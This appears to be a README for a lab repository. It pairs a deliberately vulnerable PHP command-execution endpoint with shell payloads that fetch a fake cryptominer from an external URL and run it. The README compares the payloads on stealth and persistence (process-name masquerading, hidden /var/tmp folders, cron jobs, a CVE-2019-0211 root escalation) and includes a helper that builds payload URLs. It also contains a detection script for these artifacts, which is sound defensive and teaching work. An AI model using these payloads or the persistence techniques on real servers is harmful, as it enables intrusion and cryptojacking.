heryxpc/exploitsendpointshells

Exploits using shell scripts against a vulnerable endpoint

This repository contains examples of how to build a very basic vulnerable endpoint with Apache and PHP, together with a set of sample shell scripts that run exploits delivering a fake cryptocurrency mining binary.

Contents

cryptominer

Fake code and binary of a "cryptominer". The binary is also pushed to [https://paste.c-net.org] at the URL: [https://paste.c-net.org/TossingRadical]

exploits

Sample exploits that assume an RCE vulnerability is reachable via an endpoint.

-knownvulns Provides a sample of a known vulnerability in Apache HTTP Server releases 2.4.17 to 2.4.38, using PHP 7.2.12 with Zend Framework, that performs a local privilege escalation to root. The details of the vulnerability disclosure are found here: [https://cfreal.github.io/carpe-diem-cve-2019-0211-apache-local-root.html]. The official CVE entry is here: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0211].

-scripts Each script provides a sample payload that can be used to perform an attack, assuming an existing vulnerable endpoint that runs shell scripts.

  1. escalateCVE2019-0211.sh
    • PoC of how to use the CVE-2019-0211 exploit to:
      • Copy a cryptominer payload hosted externally
      • Execute the payload with escalated privileges
      • The payload executes at the next logrotate run (e.g. daily at 6:45am, as configured in logrotate)
      • NOTE: This exploit requires the Zend framework installed and further changes to carpediem.php in order to work.
  2. infiniteLoop.sh
    • Downloads the cryptominer payload to a hidden folder under /var/tmp
    • Creates an infinite loop that runs every minute
    • Executes the cryptominer under the apache2 process name
    • Stops when the server-side process is terminated
    • The payload in /var/tmp/.h is expected to be gone after the next server reboot (true for the Docker container in this repository; on a regular host /var/tmp, unlike /tmp, persists across reboots)
    • Downside is that both the HTTP request triggering the payload and the shell script running it stay open, so they are easily monitored
    • Recommended when the source IP triggering the payload does not need to be hidden (e.g. called from a private VPN), keeping the payload on disk is acceptable, and sysadmins are not expected to restart the server
  3. runAsCron.sh
    • Downloads the cryptominer payload to a hidden folder under /var/tmp
    • Creates a cron job as the user the web server runs as
    • Deletes the file used to create the cron job
    • Recommended if the call that triggers the payload must look like a regular HTTP request, cron is not blocked for the user running the server-side process, and the payload can stay in /var/tmp until the next server reboot
  4. singleRun.sh
    • Very basic payload that simply downloads a copy of the cryptominer and runs it on the server
    • As with infiniteLoop.sh, the HTTP request stays open on both the server and the client side
    • However, it is one of the stealthiest options, since once execution finishes it removes the traces of the payload file
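The trade-offs listed above (an open HTTP request, a binary under /var/tmp/.h running under the apache2 name, a cron job for the web-server user) are also what a defender looks for. The following is an added example, not part of this repository: a small POSIX shell check run over constructed sample data (a four-column process snapshot of pid, user, comm and resolved executable path, plus a crontab listing) that flags the artifacts the infiniteLoop.sh and runAsCron.sh payloads leave behind. The sample data, the column format and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the heryxpc/exploitsendpointshells repository.
# Flags two artifacts the payloads above leave on a host:
#   - a process running under the apache2 name whose executable is not the
#     packaged /usr/sbin/apache2, or any process executing from a tmp directory
#   - a cron entry that runs something out of /var/tmp, /tmp or /dev/shm,
#     or decodes base64 on the fly
# All input below is constructed sample data (assumption), in a four-column
# format "PID USER COMM EXE" where EXE is the resolved /proc/<pid>/exe target.

SAMPLE_PROCS='1234 www-data apache2 /usr/sbin/apache2
2345 www-data apache2 /var/tmp/.h/apache2
2346 www-data miner /var/tmp/.h/miner
2347 www-data sh /bin/dash
3456 root sshd /usr/sbin/sshd'

# Constructed crontab listing as printed by "crontab -l" for the web-server
# user: one entry planted the way runAsCron.sh does, one legitimate entry.
SAMPLE_CRON='# m h dom mon dow command
* * * * * /var/tmp/.h/apache2 >/dev/null 2>&1
0 6 * * * /usr/bin/certbot renew --quiet'

# Read "PID USER COMM EXE" lines on stdin; print one line per finding.
# Rule 1: name says apache2 but the binary is not the packaged httpd.
# Rule 2: the binary lives in a world-writable tmp location.
find_suspicious_procs() {
    awk '
        $3 == "apache2" && $4 != "/usr/sbin/apache2" {
            print $1 " masquerading-apache2 " $4; next
        }
        $4 ~ /^\/(var\/)?tmp\// || $4 ~ /^\/dev\/shm\// {
            print $1 " runs-from-tmp " $4
        }
    '
}

# Read crontab lines on stdin; drop comments, print entries whose command
# touches a tmp directory or decodes base64 inline.
find_suspicious_cron() {
    grep -v '^[[:space:]]*#' | grep -E '/var/tmp/|/tmp/|/dev/shm/|base64'
}

# Run both checks over the constructed data; return the number of findings.
count_findings() {
    {
        printf '%s\n' "$SAMPLE_PROCS" | find_suspicious_procs
        printf '%s\n' "$SAMPLE_CRON" | find_suspicious_cron
    } | wc -l | tr -d ' '
}

# Live use on a Linux host (root is needed to read other users' /proc/<pid>/exe
# links and crontabs; "stat -c" is the GNU coreutils form):
#   for p in /proc/[0-9]*; do
#       printf '%s %s %s %s\n' "${p#/proc/}" "$(stat -c %U "$p")" \
#           "$(cat "$p/comm")" "$(readlink "$p/exe")"
#   done | find_suspicious_procs
#   crontab -l -u www-data | find_suspicious_cron
```

The comm-versus-exe comparison is the check that matters: renaming the miner to apache2 fools a plain process listing, but /proc/<pid>/exe still points at the dropped file under /var/tmp/.h.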

htdocs

Sample code that runs on an Apache server with PHP and executes whatever is received in the query parameter 'execute', provided it arrives as a base64 string: http://localhost/vulnerable/endpoint.php?execute=MALICIOUS_PAYLOAD_BASE64. E.g. the string 'dG91Y2ggL3Zhci90bXAvZmlsZS50eHQK', which is base64 for 'touch /var/tmp/file.txt' (with a trailing newline), creates a file on the server at /var/tmp/file.txt: http://localhost/vulnerable/endpoint.php?execute=dG91Y2ggL3Zhci90bXAvZmlsZS50eHQK. Useful to test the .sh payloads in the exploits/scripts dir. Note that base64 output can contain '+', '/' and '=', which must be percent-encoded in the query string (a bare '+' is decoded as a space and corrupts the payload before it is base64-decoded).
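As an added example (not code from this repository), the shell helpers below build the 'execute' parameter for the endpoint described above and check, with a local stand-in for the PHP side, that a payload round-trips: base64-encode, percent-encode, then decode and run. The endpoint path and parameter name are the README's; the ENDPOINT_URL variable, the function names and the percent-encoding step are this example's own assumptions, and simulate_endpoint is an assumed stand-in for endpoint.php, not its code.

```shell
#!/bin/sh
# Added example, not from the heryxpc/exploitsendpointshells repository.
# Builds the 'execute' query parameter that endpoint.php (as described in
# the README) expects, and checks the payload round-trips locally.
# ENDPOINT_URL, the function names and the percent-encoding step are this
# example's own (assumptions); the path and parameter name are the README's.

ENDPOINT_URL="${ENDPOINT_URL:-http://localhost/vulnerable/endpoint.php}"

# Base64-encode stdin as a single line. 'tr -d' stands in for the GNU-only
# 'base64 -w0' so the output is identical on GNU and BSD coreutils.
b64_payload() {
    base64 | tr -d '\n'
}

# Percent-encode the three base64 characters that are not safe in a query
# string. '+' matters most: a bare '+' in a URL is decoded as a space, so the
# PHP side would base64_decode() a corrupted string.
percent_encode_b64() {
    sed -e 's/+/%2B/g' -e 's|/|%2F|g' -e 's/=/%3D/g'
}

# Full request URL for a command read from stdin.
build_url() {
    printf '%s?execute=%s\n' "$ENDPOINT_URL" "$(b64_payload | percent_encode_b64)"
}

# Stand-in (assumption, not the repo's PHP) for what the endpoint does with
# the already URL-decoded parameter: base64-decode it and hand it to a shell.
# Lets a payload be checked locally before it is sent anywhere.
simulate_endpoint() {
    printf '%s' "$1" | base64 -d | sh
}

# Usage when saved as build_payload.sh (hypothetical filename):
#   printf 'touch /var/tmp/file.txt\n' | sh build_payload.sh
# Guarded so that sourcing the file for its functions has no side effects.
if [ "${0##*/}" = "build_payload.sh" ]; then
    build_url
fi
```

Any of the scripts in exploits/scripts can be piped through build_url to get a URL whose parameter survives the query string intact. curl does the same encoding on its own with curl -G --data-urlencode "execute=$(b64_payload < infiniteLoop.sh)" http://localhost/vulnerable/endpoint.php, which percent-encodes the value and appends it to the query string.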

Dockerfile

Sample Dockerfile that:

  • Builds an Apache server with PHP using the default configuration
  • Installs cron support
  • Copies the contents of htdocs to create the vulnerable endpoint

THE PRESENTED SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.